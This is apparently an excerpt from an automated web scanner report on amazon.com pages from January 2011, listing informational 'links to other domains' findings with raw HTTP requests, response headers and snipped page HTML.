<span id="ns_0CE2668WXXDSQR5PR7PV_5525_trackLabelB004IRUFR4" class="tiny s9_trackPreviewLabel" style="width: 109px; _padding-top: 9px">
...[SNIP]...
<div class="imageContainer"><img src="http://z-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" url="http://ecx.images-amazon.com/images/I/417XQ0XwQuL._SL135_.jpg" alt="" width="135" height="135" id="ns_0CE2668WXXDSQR5PR7PV_5525_r0Image4" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://z-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" url="http://ecx.images-amazon.com/images/I/51dC8RRX2UL._SL135_.jpg" alt="" width="133" height="135" id="ns_0CE2668WXXDSQR5PR7PV_5525_r0Image5" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://z-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" url="http://ecx.images-amazon.com/images/I/51jLKJgexYL._SL135_.jpg" alt="" width="88" height="135" id="ns_0CE2668WXXDSQR5PR7PV_5525_r0Image6" /></div>
...[SNIP]...
Eco-Drive-Chronograph-Canvas/dp/B000EQR6H0/ref=amb_link_19995401_1/184-5651957-6603505?pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-3&pf_rd_r=0CE2668WXXDSQR5PR7PV&pf_rd_t=101&pf_rd_p=488790311&pf_rd_i=507846"><img src="http://g-ecx.images-amazon.com/images/G/01/watches/B000EQR6H0._V192598437_.jpg" width="110" alt="Citizen Men's Eco-Drive Chronograph Canvas Watch #AT0200-05E" height="110" border="0" /></a>
...[SNIP]...
0-BA0850-Formula-Chronograph/dp/B0019FP47E/ref=amb_link_19995401_6/184-5651957-6603505?pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-3&pf_rd_r=0CE2668WXXDSQR5PR7PV&pf_rd_t=101&pf_rd_p=488790311&pf_rd_i=507846"><img src="http://g-ecx.images-amazon.com/images/G/01/watches/B0019FP47E._V192598089_.jpg" width="110" alt="TAG Heuer Men's Formula 1 Chronograph Watch #CAH1110.BA0850" height="110" border="0" /></a>
...[SNIP]...
-G-Shock-Riseman-Alti-Therm/dp/B001A62M04/ref=amb_link_19995401_11/184-5651957-6603505?pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-3&pf_rd_r=0CE2668WXXDSQR5PR7PV&pf_rd_t=101&pf_rd_p=488790311&pf_rd_i=507846"><img src="http://g-ecx.images-amazon.com/images/G/01/watches/B001A62M04._V192212155_.jpg" width="110" alt="Casio Men's G-Shock Riseman Alti-Therm Solar Atomic Watch #GW9200-1" height="110" border="0" /></a>
...[SNIP]...
08951_2/184-5651957-6603505?ie=UTF8&node=565108&field-keywords=acer&emi=ATVPDKIKX0DER&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-4&pf_rd_r=0CE2668WXXDSQR5PR7PV&pf_rd_t=101&pf_rd_p=1269770282&pf_rd_i=507846"><img src="http://g-ecx.images-amazon.com/images/G/01/electronics/detail-page/asus-2._V189604747_.gif" width="120" alt="Acer" height="120" border="0" /></a>
...[SNIP]...
08951_4/184-5651957-6603505?ie=UTF8&node=565108&field-keywords=dell&emi=ATVPDKIKX0DER&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-4&pf_rd_r=0CE2668WXXDSQR5PR7PV&pf_rd_t=101&pf_rd_p=1269770282&pf_rd_i=507846"><img src="http://g-ecx.images-amazon.com/images/G/01/electronics/detail-page/dell._V189604740_.gif" width="120" alt="Dell" height="120" border="0" /></a>
...[SNIP]...
_link_85008951_6/184-5651957-6603505?ie=UTF8&node=565108&brand=ASUS&emi=ATVPDKIKX0DER&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-4&pf_rd_r=0CE2668WXXDSQR5PR7PV&pf_rd_t=101&pf_rd_p=1269770282&pf_rd_i=507846"><img src="http://g-ecx.images-amazon.com/images/G/01/electronics/detail-page/asus._V189604750_.gif" width="120" alt="ASUS" height="120" border="0" /></a>
...[SNIP]...
</map><img src="http://g-ecx.images-amazon.com/images/G/01/img10/software/300-column/turbo_tax_2010_300x120._V196727518_.jpg" width="300" align="center" usemap="#TT_2010" alt="TurboTax 2010" height="120" border="0" /></td>
...[SNIP]...
</map><img src="http://g-ecx.images-amazon.com/images/G/01/amazon-credit/consumer/visa_gateway_300_4._V192208236_.gif" width="300" align="center" usemap="#amazon-visa-roto" alt="Amazon.com Rewards Visa Card" height="120" border="0" /></td>
...[SNIP]...
<a href="/ref=footer_logo/184-5651957-6603505"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

20.545. http://www.amazon.com/b/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /b/

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.amazon.com/b/?ie=UTF8&node=507846&tag=amazusnavi-20&ref=pd_sl_24x92mgoc0_b/x22
The response contains the following links to other domains:
  • http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.MSIE.xml
  • http://ecx.images-amazon.com/images/I/41-qiAEzE4L._SL135_.jpg
  • http://ecx.images-amazon.com/images/I/41LxZAhgkcL._SL135_.jpg
  • http://ecx.images-amazon.com/images/I/41eDq+YYvyL._SL135_.jpg
  • http://ecx.images-amazon.com/images/I/41eVCRbPx7L._SL135_.jpg
  • http://ecx.images-amazon.com/images/I/41mObreJEQL._SL135_.jpg
  • http://ecx.images-amazon.com/images/I/51PDazJ4nCL._SL135_.jpg
  • http://g-ecx.images-amazon.com/images/G/01/amazon-credit/consumer/visa_gateway_300_4._V192208236_.gif
  • http://g-ecx.images-amazon.com/images/G/01/camera/gw/camera-3dcams_300x75._V172108031_.jpg
  • http://g-ecx.images-amazon.com/images/G/01/electronics/detail-page/asus-2._V189604747_.gif
  • http://g-ecx.images-amazon.com/images/G/01/electronics/detail-page/asus._V189604750_.gif
  • http://g-ecx.images-amazon.com/images/G/01/electronics/detail-page/dell._V189604740_.gif
  • http://g-ecx.images-amazon.com/images/G/01/gateway/visit_amazon_ca_tcg._V229026943_.gif
  • http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif
  • http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16._V212310439_.png
  • http://g-ecx.images-amazon.com/images/G/01/img10/software/300-column/turbo_tax_2010_300x120._V196727518_.jpg
  • http://g-ecx.images-amazon.com/images/G/01/kindle/merch/gw/shasta/shasta-gw-bestselling-475x275._V172146981_.jpg
  • http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
  • http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V42752373_.gif
  • http://www.amazon.ca/
  • http://www.amazon.cn/
  • http://www.amazon.de/
  • http://www.amazon.fr/
  • http://www.amazon.it/
  • http://www.audible.com/
  • http://www.dpreview.com/
  • http://www.endless.com/
  • http://www.fabric.com/
  • http://www.imdb.com/
  • http://www.shopbop.com/welcome
  • http://www.smallparts.com/
  • http://www.warehousedeals.com/
  • http://www.woot.com/
  • http://www.zappos.com/
  • http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-10089555225.js._V173906659_.js
  • http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5791285623.css._V173906657_.css
  • http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/websiteGridCSS/websiteGridCSS-websiteGridCSS-8253._V186639940_.css
  • http://z-ecx.images-amazon.com/images/G/01/s9-campaigns/s9-widget-seeded._V172703431_.css
  • http://z-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif

Request

GET /b/?ie=UTF8&node=507846&tag=amazusnavi-20&ref=pd_sl_24x92mgoc0_b/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:36 GMT
Server: Server
x-amz-id-1: 1RQGNQ6WM7Y4MS66G38B
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: +r+poGKg+6bD50on5oekljcjzy+nvcyzjWwpkxQMpxCaWBoeQj7sCKT1NNVYKm6p
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=189-7332499-5529366; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 135637


<html>
<head>


<style type="text/css"><!--


BODY { font-family: verdana,arial,helvetica,sans-serif; font-size: x-small; background-color: #FF
...[SNIP]...
</script>


<link title="Amazon Search Suggestions" rel="search" type="application/opensearchdescription+xml" href="http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.MSIE.xml">


<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
...[SNIP]...
</title>


<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5791285623.css._V173906657_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/websiteGridCSS/websiteGridCSS-websiteGridCSS-8253._V186639940_.css' rel='stylesheet'>
<style type="text/css">
...[SNIP]...
</script>
<img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16._V212310439_.png" style="display:none" alt=""/>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" style="display:none" alt=""/>


<!--Pilu -->
...[SNIP]...
<a name="navSwmSkedPop|he|navSwmSkedPop_content"><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" class="default navSprite" id="navSwmFlyoutImage" height="1" border="0" /></a>
...[SNIP]...
<div id="navSaGwBody" class="navSaNonJs">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" height="1" width="173" class="navSaGwForceWidth" alt=""/>
<script type="text/javascript">
...[SNIP]...
</map><img src="http://g-ecx.images-amazon.com/images/G/01/camera/gw/camera-3dcams_300x75._V172108031_.jpg" width="300" align="center" usemap="#CE-0800_3D_GW" alt="3D Cameras and Camcorders" height="75" border="0" /></td>
...[SNIP]...
Dlpo%255Fixgwamuscaen-21&token=AD297DDA0F9D6C887976CD08894B02DB57139A39&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-intl-crossover-0&pf_rd_r=1RQGNQ6WM7Y4MS66G38B&pf_rd_t=101&pf_rd_p=499834531&pf_rd_i=507846"><img src="http://g-ecx.images-amazon.com/images/G/01/gateway/visit_amazon_ca_tcg._V229026943_.gif" align="center" alt="Shop at Amazon.ca" border="0" /></a>
...[SNIP]...
</map><img src="http://g-ecx.images-amazon.com/images/G/01/kindle/merch/gw/shasta/shasta-gw-bestselling-475x275._V172146981_.jpg" width="475" align="center" usemap="#kindleC2" alt="Kindle, the #1 Bestselling Product on Amazon" height="275" border="0" /></td>
...[SNIP]...
<div class="amabot_center" id="centercol">


<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" style="display:block" alt="" width="1" id="ATFMarker" onload="if (typeof uet == 'function') { uet('af'); } var gwatfcol = document.getElementById('center1'); if (gwatfcol == null) { gwatfcol = document.getElementById('centercol'); } if (gwatfcol != null) { var gwatfcolimg = gwatfcol.getElementsByTagName('img'); if (gwatfcolimg != null) { registerCSMEvent('cf', gwatfcolimg); } } for (var i=0;i<gwEH._f.length;i++) { try { gwEH._f[i](); } catch (e) {} } gwEH.afterFold = function(callback) { callback(); }"/>


<script type="text/javascript">
...[SNIP]...
</script>

<script type="text/javascript" src="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-10089555225.js._V173906659_.js"></script>
...[SNIP]...
</script>


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/s9-campaigns/s9-widget-seeded._V172703431_.css"/><div class="unified_widget rcm widget small_heading">
...[SNIP]...
<div class="imageContainer"><img src="http://ecx.images-amazon.com/images/I/51PDazJ4nCL._SL135_.jpg" alt="" width="135" height="135" id="ns_1RQGNQ6WM7Y4MS66G38B_15634_r0Image0" /></div>
...[SNIP]...
B0043X8SNQ&amp;DownloadLocation=SEARCH" onclick="return ns_1RQGNQ6WM7Y4MS66G38B_15634__S9MusicPlayer.trackPreviewPressed('B0043X8SNQ');" style="width: 135px; position: absolute; top: 108px; left: 0;">
<img id="ns_1RQGNQ6WM7Y4MS66G38B_15634_trackPreviewB0043X8SNQ" class="s9_trackPreviewButton" align="absmiddle" width="22" height="22" border="0" title="Sample" alt="Sample" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V42752373_.gif"/>
<span id="ns_1RQGNQ6WM7Y4MS66G38B_15634_trackLabelB0043X8SNQ" class="tiny s9_trackPreviewLabel" style="width: 109px; _padding-top: 9px">
...[SNIP]...
<div class="imageContainer"><img src="http://ecx.images-amazon.com/images/I/41eVCRbPx7L._SL135_.jpg" alt="" width="135" height="98" id="ns_1RQGNQ6WM7Y4MS66G38B_15634_r0Image1" style="margin-top: 19px; margin-bottom:18px;" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://ecx.images-amazon.com/images/I/41-qiAEzE4L._SL135_.jpg" alt="" width="90" height="135" id="ns_1RQGNQ6WM7Y4MS66G38B_15634_r0Image2" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://z-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" url="http://ecx.images-amazon.com/images/I/51993R08WLL._SL135_.jpg" alt="" width="135" height="135" id="ns_1RQGNQ6WM7Y4MS66G38B_15634_r0Image3" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://z-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" url="http://ecx.images-amazon.com/images/I/51NVt3k0uPL._SL135_.jpg" alt="" width="85" height="135" id="ns_1RQGNQ6WM7Y4MS66G38B_15634_r0Image4" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://z-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" url="http://ecx.images-amazon.com/images/I/51jLKJgexYL._SL135_.jpg" alt="" width="88" height="135" id="ns_1RQGNQ6WM7Y4MS66G38B_15634_r0Image5" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://z-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" url="http://ecx.images-amazon.com/images/I/51dC8RRX2UL._SL135_.jpg" alt="" width="133" height="135" id="ns_1RQGNQ6WM7Y4MS66G38B_15634_r0Image6" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://ecx.images-amazon.com/images/I/41LxZAhgkcL._SL135_.jpg" alt="" width="135" height="101" id="ns_1RQGNQ6WM7Y4MS66G38B_15635_r0Image0" style="margin-top: 17px; margin-bottom:17px;" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://ecx.images-amazon.com/images/I/41mObreJEQL._SL135_.jpg" alt="" width="135" height="135" id="ns_1RQGNQ6WM7Y4MS66G38B_15635_r0Image1" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://ecx.images-amazon.com/images/I/41eDq%2BYYvyL._SL135_.jpg" alt="" width="135" height="94" id="ns_1RQGNQ6WM7Y4MS66G38B_15635_r0Image2" style="margin-top: 21px; margin-bottom:20px;" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://z-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" url="http://ecx.images-amazon.com/images/I/51yomC0EodL._SL135_.jpg" alt="" width="135" height="101" id="ns_1RQGNQ6WM7Y4MS66G38B_15635_r0Image3" style="margin-top: 17px; margin-bottom:17px;" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://z-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" url="http://ecx.images-amazon.com/images/I/41j5TvkXZyL._SL135_.jpg" alt="" width="135" height="96" id="ns_1RQGNQ6WM7Y4MS66G38B_15635_r0Image4" style="margin-top: 20px; margin-bottom:19px;" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://z-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" url="http://ecx.images-amazon.com/images/I/41vrFBQnlAL._SL135_.jpg" alt="" width="135" height="90" id="ns_1RQGNQ6WM7Y4MS66G38B_15635_r0Image5" style="margin-top: 23px; margin-bottom:22px;" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://z-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" url="http://ecx.images-amazon.com/images/I/519sTrkvwqL._SL135_.jpg" alt="" width="135" height="90" id="ns_1RQGNQ6WM7Y4MS66G38B_15635_r0Image6" style="margin-top: 23px; margin-bottom:22px;" /></div>
...[SNIP]...
08951_2/189-7332499-5529366?ie=UTF8&node=565108&field-keywords=acer&emi=ATVPDKIKX0DER&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-4&pf_rd_r=1RQGNQ6WM7Y4MS66G38B&pf_rd_t=101&pf_rd_p=1269770282&pf_rd_i=507846"><img src="http://g-ecx.images-amazon.com/images/G/01/electronics/detail-page/asus-2._V189604747_.gif" width="120" alt="Acer" height="120" border="0" /></a>
...[SNIP]...
08951_4/189-7332499-5529366?ie=UTF8&node=565108&field-keywords=dell&emi=ATVPDKIKX0DER&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-4&pf_rd_r=1RQGNQ6WM7Y4MS66G38B&pf_rd_t=101&pf_rd_p=1269770282&pf_rd_i=507846"><img src="http://g-ecx.images-amazon.com/images/G/01/electronics/detail-page/dell._V189604740_.gif" width="120" alt="Dell" height="120" border="0" /></a>
...[SNIP]...
_link_85008951_6/189-7332499-5529366?ie=UTF8&node=565108&brand=ASUS&emi=ATVPDKIKX0DER&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-4&pf_rd_r=1RQGNQ6WM7Y4MS66G38B&pf_rd_t=101&pf_rd_p=1269770282&pf_rd_i=507846"><img src="http://g-ecx.images-amazon.com/images/G/01/electronics/detail-page/asus._V189604750_.gif" width="120" alt="ASUS" height="120" border="0" /></a>
...[SNIP]...
</map><img src="http://g-ecx.images-amazon.com/images/G/01/img10/software/300-column/turbo_tax_2010_300x120._V196727518_.jpg" width="300" align="center" usemap="#TT_2010" alt="TurboTax 2010" height="120" border="0" /></td>
...[SNIP]...
</map><img src="http://g-ecx.images-amazon.com/images/G/01/amazon-credit/consumer/visa_gateway_300_4._V192208236_.gif" width="300" align="center" usemap="#amazon-visa-roto" alt="Amazon.com Rewards Visa Card" height="120" border="0" /></td>
...[SNIP]...
<a href="/ref=footer_logo/189-7332499-5529366"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...
</script>


<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/s9-campaigns/s9-widget-seeded._V172703431_.css' rel='stylesheet'>
<script type='text/javascript'>
...[SNIP]...

20.546. http://www.amazon.com/books-used-books-textbooks/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /books-used-books-textbooks/b

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.amazon.com/books-used-books-textbooks/b?ie\\x3dUTF8\\x26amp;node\\x3d283155\\x22
The response contains the following links to other domains:
  • http://g-ecx.images-amazon.com/images/G/01/x-locale/common/kailey-kitty._V192239871_.gif
  • http://g-ecx.images-amazon.com/images/G/01/x-locale/common/orange-arrow._V192240581_.gif
  • http://g-ecx.images-amazon.com/images/G/01/x-locale/common/small-logo._V192240376_.gif

Request

GET /books-used-books-textbooks/b?ie\\x3dUTF8\\x26amp;node\\x3d283155\\x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:25 GMT
Server: Server
x-amz-id-1: 1HEB1A0Z6SR1AGWZCDG1
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: mTv6Nc2Bk4AlMl7E7LJohDMhVhB+NZJVpCayy7BlqRi0V4A5rRpGMEng83u5V2ZA
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=179-6325389-4908850; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 18638


<html>
<head>

<style type="text/css"><!--
.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-size: small; }
.small { font-fami
...[SNIP]...
<a href="/179-6325389-4908850"><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/small-logo._V192240376_.gif" width="142" height="31" border="0" /></a>
...[SNIP]...
<td>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/kailey-kitty._V192239871_.gif" width="40" height="35" border="0" />
</td>
...[SNIP]...
<br />
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/orange-arrow._V192240581_.gif" width="10" height="9" border="0" />
<b>
...[SNIP]...

20.547. http://www.amazon.com/dp/0313363153

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /dp/0313363153

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.amazon.com/dp/0313363153?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=0313363153&adid=1E43GGA9XAJKCAEXAPNZ&
The response contains the following links to other domains:

Request

GET /dp/0313363153?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=0313363153&adid=1E43GGA9XAJKCAEXAPNZ& HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:06:18 GMT
Server: Server
x-amz-id-1: 1XEKQW5VKEVTKXS2HSJA
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: XeWIrG239x/NdCZhKVLDJEcUlefLzu6eYfgdzbR7oX4dl76GDeDVLHHKaEiGy4dJ
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=188-3368164-3583051; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=cNF169Ic3p+FLZlmECYIuJwUEnmMidNZpqOMXJlzFfyGkoLR/f0WF8vs6ZQU5HX+qBwE7qqoL3t9fdNtjPj3gyYsZ9OPP64Bj28wuj43iGA+RQm2aZs0leyoMSaGWoAmLLFT4m57m2mg/M9gT8m8zgH4Tc7xnQpx7XV0ybHDfWS2rJ30owc8Rfy1J4pUKTmIEUgNrK9xS2pwjtjSqsQvCH98yL0TxvhtC5sb3N+5Hsbf09QrIa+pq7nenC2PQqxud5/rAY2tUqp08BC6AQqUm9FRfG4U//pmCE8P+Nf4Ay6b7r0qWful6/GAXYGc9NJ8UFNtl8lIxNbvvKSGUwWxMFhHe2yFoXqfgLXGtAif6/GMRqdmxDwAFvFgrcU5U0NDFanauf5u8xPOR/t4Rw9yAVQVnhKW/N98x8jGOU9360lRgvHsw0R7W92mPEKiYj0h57Jn/qFxIY4=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:06:18 2011 GMT
Content-Length: 369008


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...
</style>


                <link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css" />


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css" />


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/gridCSS/US-combined-1136328220.css._V175075348_.css" />


<noscript><link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" /></noscript>

<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css"/>


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css" />


   <link rel="stylesheet" type="text/css" href=http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css />

<style type="text/css">
...[SNIP]...
</style>


<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5791285623.css._V173906657_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css' rel='stylesheet'>
<style type="text/css">
...[SNIP]...
</title>

<link title="Amazon Search Suggestions" rel="search" type="application/opensearchdescription+xml" href="http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml">


<!--[if IE]>
...[SNIP]...
</script>
<img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16._V212310439_.png" style="display:none" alt=""/>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" style="display:none" alt=""/>


<!--Pilu -->
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
